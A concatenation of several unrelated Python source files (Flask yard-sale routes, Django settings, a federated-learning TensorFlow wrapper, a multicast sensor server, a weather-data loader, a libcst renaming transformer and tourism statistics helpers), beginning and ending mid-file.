    google_coor = get_google_coord(full_addr)
    addr_lat = google_coor[0]
    addr_long = google_coor[1]
    # replace_one() performs the same whole-document replacement as the
    # original full-document update(); Collection.update() was deprecated
    # and removed in PyMongo 4.
    yardsales.replace_one({'_id': ObjectId(yardsale_id)},
                          {
                              'seller_first_name': request.form.get('first_name'),
                              'seller_last_name': request.form.get('last_name'),
                              'seller_email': request.form.get('email'),
                              'item_list': request.form.getlist('itemlist'),
                              'date': request.form.get('saledate'),
                              'time': request.form.get('saletime'),
                              'category': request.form.get('salecat', '').capitalize(),
                              'address_1': request.form.get('address1'),
                              'city': request.form.get('city'),
                              'state': request.form.get('state'),
                              'country_code': request.form.get('countrycode'),
                              'zip': request.form.get('zip'),
                              'lat': addr_lat,
                              'long': addr_long
                          })
    return render_template('updatedeleteyardsales.html',
                           record_status='updated')
# route to delete yardsale record from collection
@app.route('/delete_yardsale/<yardsale_id>/<record_status>')
def delete_yardsale(yardsale_id, record_status):
    """Delete the yard sale with the given id, then show the search page."""
    # delete_one() replaces Collection.remove(), which was deprecated and
    # removed in PyMongo 4.
    mongo.db.yard_sales.delete_one({'_id': ObjectId(yardsale_id)})
    return render_template('updatedeleteyardsales.html',
                           record_status='deleted')
# About us page route
@app.route('/about')
def about():
    """Render the static About Us page."""
    return render_template('about.html')
# Contact us page route
@app.route('/contact_us')
def contact_us():
    """Render the static Contact Us page."""
    return render_template('contact_us.html')
# 404 error page route
@app.errorhandler(404)
def page_error(error):
    """Render the custom 404 page with the matching HTTP status code."""
    return render_template("404.html"), 404
if __name__ == '__main__':
    # Bind host/port from the environment (IP/PORT) with local defaults.
    app.run(host=os.environ.get('IP', '0.0.0.0'),
            port=int(os.environ.get('PORT', "5000")),
            debug=False)
|
"""
Django settings for django_tpq project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import environ
from os.path import join as pathjoin
ROOT = environ.Path(__file__) - 3
ENV = environ.Env()
# Layered env files: .env carries local configuration, .env-version the
# deployed version tag.
environ.Env.read_env(pathjoin(str(ROOT), '.env'))
environ.Env.read_env(pathjoin(str(ROOT), '.env-version'))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Read from the SECRET_KEY environment variable when set; the literal
# below is retained only as a development fallback.
SECRET_KEY = ENV.str(
    'SECRET_KEY',
    default='3vb(bmz7j4x$89g^@&s3#rx^0)hy4ih7w7hscioj%1aj62c%$1')
# SECURITY WARNING: don't run with debug turned on in production!
# Overridable via the DEBUG environment variable; defaults to True to
# preserve the previous development behaviour.
DEBUG = ENV.bool('DEBUG', default=True)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'main',
    'futures',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_tpq.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'django_tpq.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# DATABASE_URL env var overrides the local development default.
DATABASES = {
    'default': ENV.db(default='postgresql://django_tpq:password@localhost/django_tpq'),
}
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
        'LOCATION': '/var/tmp/django_cache',
        'OPTIONS': {
            # Necessary to allow stress test to complete.
            'MAX_ENTRIES': 2000,
        },
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Project specific configuration.
# Queue model used by the futures app, plus cache backend/TTL for results.
FUTURES_QUEUE_NAME = 'futures.FutureQueue'
FUTURES_CACHE_BACKEND = 'default'
FUTURES_CACHE_TTL = 300
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import tensorflow as tf
from federatedml.framework.weights import OrderDictWeights
from federatedml.nn.homo_nn.nn_model import NNModel, DataConverter
class TFNNModel(NNModel):
    """NNModel implementation backed by a TensorFlow 1.x graph/session.

    The caller builds the graph (optimizer, loss, metric and prediction
    ops); this class owns the session, the training step, metric
    evaluation and weight import/export for federated aggregation.
    """

    def __init__(self, optimizer, loss, metrics, predict_ops):
        self._optimizer = optimizer
        self._loss = loss
        # Accept either a single metric op or a list of them.
        if not isinstance(metrics, list):
            metrics = [metrics]
        self._metrics = {TFNNModel._trim_device_str(metric.name): metric
                         for metric in metrics}
        self._train_op = self._optimizer.minimize(self._loss)
        self._sess = tf.Session()
        self._sess.run(tf.global_variables_initializer())
        self.saver = tf.train.Saver()
        # name -> variable, keyed by the trimmed name so weights can be
        # matched up independently of scope/device suffixes.
        self._trainable_weights = {self._trim_device_str(v.name): v for v in
                                   tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)}
        self._predict_ops = predict_ops

    @staticmethod
    def _trim_device_str(name):
        # Keep only the portion of the tensor name before the first "/".
        return name.split("/")[0]

    def get_model_weights(self):
        """Return the current trainable weights wrapped in OrderDictWeights."""
        return OrderDictWeights(self._sess.run(self._trainable_weights))

    def set_model_weights(self, weights):
        """Assign (aggregated) weight values back into the graph variables."""
        unboxed = weights.unboxed
        self._sess.run([tf.assign(v, unboxed[name])
                        for name, v in self._trainable_weights.items()])

    def get_batch_evaluate(self, batch):
        """Evaluate all metrics on one feed-dict batch; returns name -> value."""
        return self._sess.run(self._metrics, feed_dict=batch)

    def train_batch(self, batch):
        """Run one optimizer step on a single feed-dict batch."""
        return self._sess.run(self._train_op, feed_dict=batch)

    def train(self, data, **kwargs):
        """Train over every batch yielded by *data* once."""
        for batch in data:
            self.train_batch(batch)

    def evaluate(self, data, **kwargs):
        """Sum each metric over all batches; returns name -> total value."""
        total = {name: 0.0 for name in self._metrics}
        for batch in data:
            # Bug fix: iterate .items() of the metric dict returned by
            # get_batch_evaluate(); the original called dict.item(),
            # which raises AttributeError.
            for k, v in self.get_batch_evaluate(batch).items():
                total[k] += v
        return total

    def export_model(self):
        """Serialize the graph with all variables frozen into constants."""
        frozen_graph_def = tf.graph_util.convert_variables_to_constants(
            self._sess,
            self._sess.graph_def,
            [v.name.split(":")[0] for v in self._predict_ops.values()]
        )
        return frozen_graph_def.SerializeToString()
class TFFitDictData(object):
    """Materialize a distributed dataset into in-memory x/y arrays and
    serve them as fixed-size feed-dict batches.
    """

    def __init__(self, data_instances, batch_size, **kwargs):
        self.size = data_instances.count()
        if self.size <= 0:
            raise ValueError("empty data")
        # Probe the first record to learn the per-sample x/y shapes.
        first_value = data_instances.first()[1]
        self.x = np.zeros((self.size, *first_value[0].shape))
        self.y = np.zeros((self.size, *first_value[1].shape))
        # Copy every (key, value) record into the dense arrays in order.
        for row, (_, value) in enumerate(data_instances.collect()):
            self.x[row] = value[0]
            self.y[row] = value[1]
        self.batch_size = batch_size
        # Extra key/values merged into every batch dict (e.g. flags).
        self.additional_kv = kwargs

    def __getitem__(self, index):
        """Return the batch at position *index* as a feed dict."""
        lo = index * self.batch_size
        hi = lo + self.batch_size
        return dict(x=self.x[lo: hi], y=self.y[lo: hi], **self.additional_kv)

    def __len__(self):
        """Number of batches (the final batch may be partial)."""
        return int(np.ceil(self.size / float(self.batch_size)))

    def __iter__(self):
        """Yield batches forever, cycling over the dataset (Keras-style)."""
        while True:
            for index in range(len(self)):
                yield self[index]
class TFFitDictDataConverter(DataConverter):
    """DataConverter that wraps datasets in TFFitDictData batch iterators."""
    def convert(self, data, *args, **kwargs):
        # Delegate straight to the TFFitDictData constructor.
        return TFFitDictData(data, *args, **kwargs)
|
# -*- coding: UTF-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = "d01"
__email__ = "<EMAIL>"
__copyright__ = "Copyright (C) 2015-16, <NAME>"
__license__ = "MIT"
__version__ = "0.1.0"
__date__ = "2016-03-31"
# Created: 2015-03-21 24:00
import socket
import platform
import threading
from ..sensorInterface import SensorServerInterface, \
SensorStartException
from .sensor import Sensor
from .message import Id, MsgType, \
ProtocolViolation, APPConfigMessage, APPMessage
from ...person import Person
class SensorServer(Sensor, SensorServerInterface):
    """
    APP sensor server.

    Listens for multicast JOIN/UNJOIN/UPDATE packets from sensor clients,
    keeps a registry of connected clients and forwards people changes to
    the attached changer.
    """

    def __init__(self, settings=None):
        """
        Initialize the sensor server.

        :param settings: Settings for the server (default: None)
        :type settings: dict | None
        """
        if settings is None:
            settings = {}
        super(SensorServer, self).__init__(settings)
        self._device_id = Id.SERVER
        # Seconds to wait for a new packet before re-checking the stop flag
        self._packet_wait = settings.get("packet_wait_timeout", 1.5)
        # Port to listen on for multicast messages
        self._multicast_bind_port = settings.get(
            "multicast_bind_port",
            self._multicast_port
        )
        # device_id -> client info dict of registered clients
        self._clients = {}
        # key ("ip:port") -> device_id lookup
        self._key2deviceId = {}
        # TODO sync access to clients
        # Socket listening for multicast messages (None while not started)
        self._multicast_socket = None
        # Use event additionally to is_running so threads can wait on it
        self._is_stopped = threading.Event()

    def _packet_loop(self):
        """
        Loop (while running) over the inbox and handle incoming packets.

        :rtype: None
        """
        while not self._is_stopped.is_set():
            # Avoid busy-waiting: block up to _packet_wait for a new packet
            if self.inbox.empty() and \
                    not self.new_packet.wait(self._packet_wait):
                continue
            ip, port, packet = self.inbox.get()
            if self.inbox.empty():
                self.new_packet.clear()
            self._do_packet(packet, ip, port)

    def _do_packet(self, packet, ip, port):
        """
        React to incoming packet by dispatching on its message type.

        :param packet: Packet to handle
        :type packet: T >= paps.si.app.message.APPMessage
        :param ip: Client ip address
        :type ip: unicode
        :param port: Client port
        :type port: int
        :rtype: None
        """
        msg_type = packet.header.message_type

        if msg_type == MsgType.JOIN:
            self._do_join_packet(packet, ip, port)
        elif msg_type == MsgType.UNJOIN:
            self._do_unjoin_packet(packet, ip, port)
        elif msg_type == MsgType.UPDATE:
            self._do_update_packet(packet, ip, port)
        # Other message types are silently ignored

    def _do_join_packet(self, packet, ip, port):
        """
        React to join packet - add a client to this server.

        :param packet: Packet from client that wants to join
        :type packet: paps.si.app.message.APPJoinMessage
        :param ip: Client ip address
        :type ip: unicode
        :param port: Client port
        :type port: int
        :rtype: None
        """
        self.debug("()")
        device_id = packet.header.device_id
        key = u"{}:{}".format(ip, port)

        if device_id == Id.REQUEST:
            # Client asked for a fresh id (or re-joins from a known key)
            device_id = self._new_device_id(key)
        client = self._clients.get(device_id, {})
        data = {}

        if packet.payload:
            # Best effort: a malformed payload degrades to an empty dict
            # (was a bare except:; narrowed so KeyboardInterrupt escapes)
            try:
                data = packet.payload
            except Exception:
                data = {}
        client['device_id'] = device_id
        client['key'] = key
        people = []

        try:
            for index, person_dict in enumerate(data['people']):
                person = Person()
                person.from_dict(person_dict)
                # Prefix with device id to keep ids unique across clients
                person.id = u"{}.{}".format(device_id, person.id)
                # To get original id -> id.split('.')[0]
                people.append(person)
            self.changer.on_person_new(people)
        except Exception:
            self.exception("Failed to update people")
            return
        # Original ids (without device id)
        client['people'] = people
        # Add config to client data?
        client_dict = dict(client)
        del client_dict['people']
        self._send_packet(ip, port, APPConfigMessage(payload=client_dict))
        self._clients[device_id] = client
        self._key2deviceId[key] = device_id

    def _do_unjoin_packet(self, packet, ip, port):
        """
        React to unjoin packet - remove a client from this server.

        :param packet: Packet from client that wants to leave
        :type packet: paps.si.app.message.APPJoinMessage
        :param ip: Client ip address
        :type ip: unicode
        :param port: Client port
        :type port: int
        :rtype: None
        """
        self.debug("()")
        device_id = packet.header.device_id

        if device_id <= Id.SERVER:
            self.error("ProtocolViolation: Invalid device id")
            return
        client = self._clients.get(device_id)

        if not client:
            self.error("ProtocolViolation: Client is not registered")
            return
        key = u"{}:{}".format(ip, port)

        if client['key'] != key:
            self.error(
                u"ProtocolViolation: Client key ({}) has changed: {}".format(
                    client['key'], key
                )
            )
            return
        # Packet info seems ok
        try:
            self.changer.on_person_leave(client['people'])
        except Exception:
            self.exception("Failed to remove people")
            return
        # Forget client?
        del self._clients[device_id]
        del self._key2deviceId[key]
        del client

    def _do_update_packet(self, packet, ip, port):
        """
        React to update packet - people/person on a device have changed.

        :param packet: Packet from client with changes
        :type packet: paps.si.app.message.APPUpdateMessage
        :param ip: Client ip address
        :type ip: unicode
        :param port: Client port
        :type port: int
        :rtype: None
        """
        self.debug("()")
        device_id = packet.header.device_id

        if device_id <= Id.SERVER:
            self.error("ProtocolViolation: Invalid device id")
            return
        client = self._clients.get(device_id, None)

        if not client:
            self.error("ProtocolViolation: Client is not registered")
            return
        key = u"{}:{}".format(ip, port)

        if client['key'] != key:
            self.error(
                u"ProtocolViolation: Client key ({}) has changed: {}".format(
                    client['key'], key
                )
            )
            return
        # Packet info seems ok
        try:
            people = packet.people()
        except ProtocolViolation:
            self.exception("Failed to decode people from packet")
            return
        # Verify same number of people in update as registered to client
        # (APP specific)
        if len(people) != len(client['people']):
            self.error("ProtocolViolation: Incorrect number of people updated")
            # BUG FIX: previously fell through; a longer list would raise
            # IndexError on client['people'][index] below
            return
        changed = []

        # Add ids to all people
        # Assumes same order here as on the client (e.g from the join())
        for index, person in enumerate(people):
            old = client['people'][index]
            person.id = old.id

            if person != old:
                old.sitting = person.sitting
                # Maybe sent person to protect access to local saved state
                changed.append(old)

        if changed:
            # Only update if there is really a change
            try:
                self.changer.on_person_update(changed)
            except Exception:
                self.exception("Failed to notify people update")
                return
        else:
            self.debug("No people updated")

    def _new_device_id(self, key):
        """
        Generate a new device id or return existing device id for key.

        :param key: Key for device ("ip:port")
        :type key: unicode
        :return: The device id
        :rtype: int
        """
        device_id = Id.SERVER + 1

        if key in self._key2deviceId:
            # Known endpoint re-joining: keep its previous id
            return self._key2deviceId[key]

        # Find the lowest id not yet in use
        while device_id in self._clients:
            device_id += 1
        return device_id

    def _init_multicast_socket(self):
        """
        Init multicast socket.

        :rtype: None
        """
        self.debug("()")
        # Create a UDP socket
        self._multicast_socket = socket.socket(
            socket.AF_INET,
            socket.SOCK_DGRAM
        )
        # Allow reuse of addresses
        self._multicast_socket.setsockopt(
            socket.SOL_SOCKET,
            socket.SO_REUSEADDR,
            1
        )
        # Set multicast interface to local_ip
        self._multicast_socket.setsockopt(
            socket.IPPROTO_IP,
            socket.IP_MULTICAST_IF,
            socket.inet_aton(self._multicast_ip)
        )
        # Set multicast time-to-live
        # Should keep our multicast packets from escaping the local network
        self._multicast_socket.setsockopt(
            socket.IPPROTO_IP,
            socket.IP_MULTICAST_TTL,
            self._multicast_ttl
        )
        self._add_membership_multicast_socket()

        # Bind socket
        # macOS cannot bind to the multicast group address directly
        if platform.system().lower() == "darwin":
            self._multicast_socket.bind(("0.0.0.0", self._multicast_bind_port))
        else:
            self._multicast_socket.bind(
                (self._multicast_ip, self._multicast_bind_port)
            )
        self._listening.append(self._multicast_socket)

    def _shutdown_multicast_socket(self):
        """
        Shutdown multicast socket.

        :rtype: None
        """
        self.debug("()")
        self._drop_membership_multicast_socket()
        self._listening.remove(self._multicast_socket)
        self._multicast_socket.close()
        self._multicast_socket = None

    def _add_membership_multicast_socket(self):
        """
        Make membership request to multicast group.

        :rtype: None
        """
        self._membership_request = socket.inet_aton(self._multicast_group) \
            + socket.inet_aton(self._multicast_ip)
        # Send add membership request to socket
        # See http://www.tldp.org/HOWTO/Multicast-HOWTO-6.html
        # for explanation of sockopts
        self._multicast_socket.setsockopt(
            socket.IPPROTO_IP,
            socket.IP_ADD_MEMBERSHIP,
            self._membership_request
        )

    def _drop_membership_multicast_socket(self):
        """
        Drop membership to multicast group.

        :rtype: None
        """
        # Leave group
        self._multicast_socket.setsockopt(
            socket.IPPROTO_IP,
            socket.IP_DROP_MEMBERSHIP,
            self._membership_request
        )
        self._membership_request = None

    def start(self, blocking=False):
        """
        Start the interface.

        :param blocking: Should the call block until stop() is called
            (default: False)
        :type blocking: bool
        :rtype: None
        :raises SensorStartException: Failed to start
        """
        self.debug("()")

        try:
            self._init_multicast_socket()
        except Exception:
            self._multicast_socket = None
            self.exception("Failed to init multicast socket")
            raise SensorStartException("Multicast socket init failed")
        # Start the underlying sensor non-blocking so the packet loop
        # thread can be launched first
        super(SensorServer, self).start(blocking=False)
        self._is_stopped.clear()

        try:
            a_thread = threading.Thread(
                target=self._thread_wrapper,
                args=(self._packet_loop,)
            )
            a_thread.daemon = True
            a_thread.start()
        except Exception:
            self.exception("Failed to run packet loop")
            raise SensorStartException("Packet loop failed")
        self.info("Started")
        # Blocking
        # NOTE(review): intentionally skips Sensor in the MRO and calls the
        # grandparent's start() for the blocking behaviour -- confirm
        super(Sensor, self).start(blocking)

    def stop(self):
        """
        Stop the sensor server (soft stop - signal packet loop to stop).

        Warning: Is non blocking (server might still do something after this!)

        :rtype: None
        """
        self.debug("()")
        super(SensorServer, self).stop()

        # No new clients
        if self._multicast_socket is not None:
            self._shutdown_multicast_socket()
        # Signal packet loop to shutdown
        self._is_stopped.set()
|
# -*- coding: utf-8 -*-
#
# # <NAME>
# # Kotel'nikov Institute of Radio-engineering and Electronics of RAS
# # 2019
#
import csv
import regex as re
import os
import sys
from collections import defaultdict
from settings import Settings
from termcolor import colored
# Searches every subdirectory of `catalog` for files named `f`
def __find_files(catalog, f) -> list:
    """Recursively collect the paths of every file named *f* under *catalog*."""
    matches = []
    for root, _dirs, names in os.walk(catalog):
        matches.extend(os.path.join(root, name) for name in names if name == f)
    return matches
def load(MeteoData, base=Settings.meteoBaseDir) -> None:
    """Build the on-disk weather database from raw meteo CSV files.

    Each CSV row is appended to a ``base/YYYY/MM/DD/data`` file; afterwards
    duplicated timestamps inside each data file are averaged (or, when the
    values are not numeric, replaced by a single complete record, or
    dropped entirely).

    :param MeteoData: paths of the meteo CSV files to import
    :param base: root directory of the weather database
    """
    print('Wait...')
    if not os.path.exists(base):
        for i, csvpath in enumerate(MeteoData):
            with open(csvpath, 'r') as csvfile:
                MeteoDataReader = csv.reader(csvfile, delimiter=',')
                for k, row in enumerate(MeteoDataReader):
                    if not k:
                        continue  # skip the CSV header row
                    data = re.split('[/ ]', row[0]) + row[1:7]
                    # data[0..2] -- year (YYYY) / month (MM) / day (DD)
                    # data[3]    -- time (hh:mm)
                    # data[4..8] -- pressure, temperature, humidity,
                    #               wind speed, rain rate
                    dirPath = os.path.join(base, data[0], data[1], data[2])
                    # exist_ok replaces the previous isdir/makedirs triple
                    os.makedirs(dirPath, exist_ok=True)
                    filePath = os.path.join(dirPath, 'data')
                    with open(filePath, 'a') as file:
                        file.write(' '.join(data[3:9]) + '\n')
                    if not (k % 1000):
                        sys.stdout.write("Strings processed: %dк \r" % (k // 1000))
                        sys.stdout.flush()
            print('\nMeteostation #{}\t'.format(i + 1) + '[' + colored('OK', 'green') + ']')
    # NOTE(review): original indentation was ambiguous; deduplication below
    # runs even when the database already existed -- confirm intended.
    print('Additional operations...')
    deleted = 0
    DataList = __find_files(base, 'data')
    for datapath in DataList:
        print('{}\tProcessing...'.format(datapath))
        DATA = defaultdict(list)
        with open(datapath, 'r') as datafile:
            for row in datafile:
                data = re.split(' ', re.sub('\n', '', row))
                # data[0]    -- time (hh:mm)
                # data[1..5] -- pressure, temperature, humidity,
                #               wind speed, rain rate
                DATA[data[0]].append(data)
        i = 0
        # BUG FIX: iterate over a snapshot of the keys; entries may be
        # deleted inside the loop and mutating a dict while iterating it
        # raises RuntimeError in Python 3.
        for time in list(DATA.keys()):
            if len(DATA[time]) > 1:
                i += 1
                sdata = []
                # Remember one complete record as a fallback
                for item in DATA[time]:
                    if len(item) == 6:
                        sdata = item[:]
                try:
                    P, T, Hum, Wind, RainRt, k = 0., 0., 0., 0., 0., 0
                    for data in DATA[time]:
                        P += float(data[1])
                        T += float(data[2])
                        Hum += float(data[3])
                        Wind += float(data[4])
                        RainRt += float(data[5])
                        k += 1
                    P /= k
                    T /= k
                    Hum /= k
                    Wind /= k
                    RainRt /= k
                    # BUG FIX: the time column is an 'hh:mm' string;
                    # '{:.3f}'.format(time) raised ValueError on every
                    # duplicate, silently discarding the averaged record.
                    data = [time, '{:.3f}'.format(P), '{:.3f}'.format(T),
                            '{:.3f}'.format(Hum), '{:.3f}'.format(Wind),
                            '{:.3f}'.format(RainRt)]
                    DATA[time].clear()
                    DATA[time].append(data)
                except ValueError:
                    # Non-numeric values: keep the single complete record
                    # if one exists, otherwise drop the timestamp entirely.
                    if sdata:
                        DATA[time].clear()
                        DATA[time].append(sdata)
                    else:
                        deleted += len(DATA[time])
                        del DATA[time]
                    continue
        if i:
            print('Duplicated timestamps: {}'.format(i))
        with open(datapath, 'w') as datafile:
            for time in sorted(DATA.keys()):
                for data in DATA[time]:
                    datafile.write(time + ' ' + data[1] + ' ' + data[2] + ' ' +
                                   data[3] + ' ' + data[4] + ' ' +
                                   data[5] + '\n')
        DATA.clear()
    print('{} timestamps are completely removed'.format(deleted))
    print('Weather database\t[' + colored('OK', 'green') + ']')
    return
def delete():
    """Remove the entire on-disk weather database, if present."""
    if os.path.exists(Settings.meteoBaseDir):
        # Walk bottom-up so every directory is empty by the time we rmdir it
        for root, dirnames, filenames in os.walk(Settings.meteoBaseDir, topdown=False):
            for filename in filenames:
                os.remove(os.path.join(root, filename))
            for dirname in dirnames:
                os.rmdir(os.path.join(root, dirname))
        os.rmdir(Settings.meteoBaseDir)
    print('Removing weather database\t' + '[' + colored('OK', 'green') + ']')
    return
|
"""
Contains the "RenameVariableTransformer" that renames a variable and all its uses.
"""
import random
from abc import ABC
import logging as log
import libcst as cst
from libcst import CSTNode
from lampion.transformers.basetransformer import BaseTransformer
from lampion.utils.naming import get_random_string, get_pseudo_random_string
class RenameVariableTransformer(BaseTransformer, ABC):
    """
    Transformer that renames a random local variable with a random name.

    The variable is renamed at all places, that means it will also be changed at
    different locations if things happen to be named the same.
    TODO: This could lead to problems if people name variables like methods?

    This transformer will not be applied if there are no assigned variables.
    Class-Attributes, or attributes in private / sub-classes are valid targets for change too.

    Before:
    > def hi():
    >   some = 5
    >   thing = 3
    >   return some + thing

    After:
    > def hi():
    >   whnpwhenpwh = 5
    >   thing = 3
    >   return whnpwhenpwh + thing
    """

    def __init__(self, string_randomness: str = "pseudo", max_tries:int = 75):
        # Only the two supported generation strategies are accepted.
        if string_randomness in ["pseudo", "full"]:
            self.__string_randomness = string_randomness
        else:
            raise ValueError("Unrecognized Value for String Randomness, supported are pseudo and full")

        self._worked = False
        self.set_max_tries(max_tries)
        log.info("RenameVariableTransformer created (%d Re-Tries)",self.get_max_tries())

    def apply(self, cst_to_alter: CSTNode) -> CSTNode:
        """
        Apply the transformer to the given CST.
        Returns the original CST on failure or error.

        Check the function "worked()" whether the transformer was applied.

        :param cst_to_alter: The CST to alter.
        :return: The altered CST or the original CST on failure.

        Also, see the BaseTransformers notes if you want to implement your own.
        """
        visitor = self.__VariableCollector()

        altered_cst = cst_to_alter

        tries: int = 0
        max_tries: int = self.get_max_tries()

        while (not self._worked) and tries <= max_tries:
            try:
                # Collect all assigned variable targets in the tree.
                cst_to_alter.visit(visitor)
                # NOTE(review): "finished" is a class attribute that is never
                # set to False, so this marks _worked True before the
                # empty-variables check below -- confirm intended.
                self._worked = visitor.finished

                # Deduplicate by name via a set before listing.
                seen_names = list({x.target.value for x in visitor.seen_variables})
                # Exit early: No local Variables!
                if len(seen_names) == 0:
                    self._worked = False
                    return cst_to_alter

                to_replace = random.choice(seen_names)

                if self.__string_randomness == "pseudo":
                    replacement = get_pseudo_random_string()
                elif self.__string_randomness == "full":
                    replacement = get_random_string(5)

                renamer = self.__Renamer(to_replace, replacement)

                altered_cst = cst_to_alter.visit(renamer)

                tries = tries + 1
            except AttributeError:
                # This case happened when the seen variables were tuples
                # Seen in OpenVocabCodeNLM Test Data
                tries = tries + 1

        if tries == max_tries:
            log.warning("Rename Variable Transformer failed after %i attempt",max_tries)

        return altered_cst

    def reset(self) -> None:
        """Resets the Transformer to be applied again.

        after the reset all local state is deleted, the transformer is fully reset.

        It holds:
        > a = SomeTransformer()
        > b = SomeTransformer()
        > someTree.visit(a)
        > a.reset()
        > assert a == b
        """
        self._worked = False

    def worked(self) -> bool:
        """
        Returns whether the transformer was successfully applied since the last reset.
        If the transformer cannot be applied for logical reasons it will return false without attempts.

        :returns bool
            True if the Transformer was successfully applied.
            False otherwise.
        """
        return self._worked

    def categories(self) -> [str]:
        """
        Gives the categories specified for this transformer.
        Used only for information and maybe later for filter purposes.
        :return: The categories what this transformer can be summarized with.
        """
        return ["Naming"]

    def postprocessing(self) -> None:
        """
        Manages all behavior after application, in case it worked(). Also calls reset().
        """
        self.reset()

    class __VariableCollector(cst.CSTVisitor):
        """
        CSTVisitor that collects all variable-names in traversal.
        Any seen value is saved in an attribute "seen_variables"
        """

        def __init__(self):
            self.seen_variables = []

        # NOTE(review): class-level defaults declared after __init__; the
        # instance attribute above shadows "seen_variables" per instance.
        finished = True
        seen_variables = []

        # "visit_Name" visits what we want in the end, but is too broad:
        # The method class etc. also have names, but we only want assign ones
        # If we go only for assigned ones, we do not change parameters / methods etc.

        def visit_Assign_targets(self, node: "Assign") -> None:
            """
            Adds the seen variables to the "seen_variables" attribute.

            :param node: the node touched in traversal
            :return: None
            """
            # There are assigns with multiple targets, e.g. tuples or dicts.
            # For now we focus on the simple cases
            if len(node.targets) == 1:
                self.seen_variables.append(node.targets[0])
            return

        # AnnAssign is for "Annotated Assign". It does not necessarily need a value assigned, you can
        # Assign only types without values.
        # See Libcst on this: https://libcst.readthedocs.io/en/latest/nodes.html?highlight=visit_Assign_Target#libcst.AnnAssign
        def visit_AnnAssign_target(self, node: "AnnAssign") -> None:
            """
            Adds the seen typed variables to the "seen_variables" attribute.

            :param node: the node touched in traversal
            :return: None
            """
            self.seen_variables.append(node)

    class __Renamer(cst.CSTTransformer):
        """
        The CSTTransformer that traverses the CST and renames variables.
        Currently does not care about the scoping - all occurrences will be renamed.
        """

        def __init__(self, to_replace: str, replacement: str):
            # Name to look for, and the name it is rewritten to.
            self.to_replace = to_replace
            self.replacement = replacement

        def leave_Name(
                self, original_node: "Name", updated_node: "Name"
        ) -> "BaseExpression":
            """
            Renames the variable if it was the one to be replaced.
            What to replace and what to replace with are given in __init__.

            Have a careful at the tests for this class to understand the behaviour.

            :param original_node: the node before change
            :param updated_node: the node after change
            :return: the node after change, too.
            """
            if original_node.value == self.to_replace:
                return updated_node.with_changes(value=self.replacement)
            return updated_node
|
from ..DB.Repositorio_Turistas_Entrantes_INE import RepositoryTuristasEntrantesINE as DBRepository
from ..Utilidades.Conversores import Conversores as Conversor
def obtener_porcentaje_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_rango_anio_mensualmente(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin):
    """
    Monthly percentage of incoming tourists arriving at CiudadDestino from
    CiudadOrigen over the year range [AnioInicio, AnioFin].

    :param CiudadDestino: destination city
    :type CiudadDestino: str
    :param CiudadOrigen: origin city
    :type CiudadOrigen: str
    :param AnioInicio: first year of the range
    :type AnioInicio: int
    :param AnioFin: last year of the range
    :type AnioFin: int
    :return: extended-JSON payload built from the query result
    """
    conversor = Conversor()
    repository = DBRepository()
    cursor, labels = repository.ObtenerPorcentajeTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAniosMensualmente(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin)
    arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
    # Render the query result as extended JSON
    matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
    retval = conversor.ObtenerDataJSONExtendido(matriz)
    return retval
def obtener_cantidad_total_turistas_entrantes_en_ciudad_anio(Ciudad, Anio):
    """
    Total number of incoming tourists arriving at a city during a year.

    :param Ciudad: destination city
    :type Ciudad: str
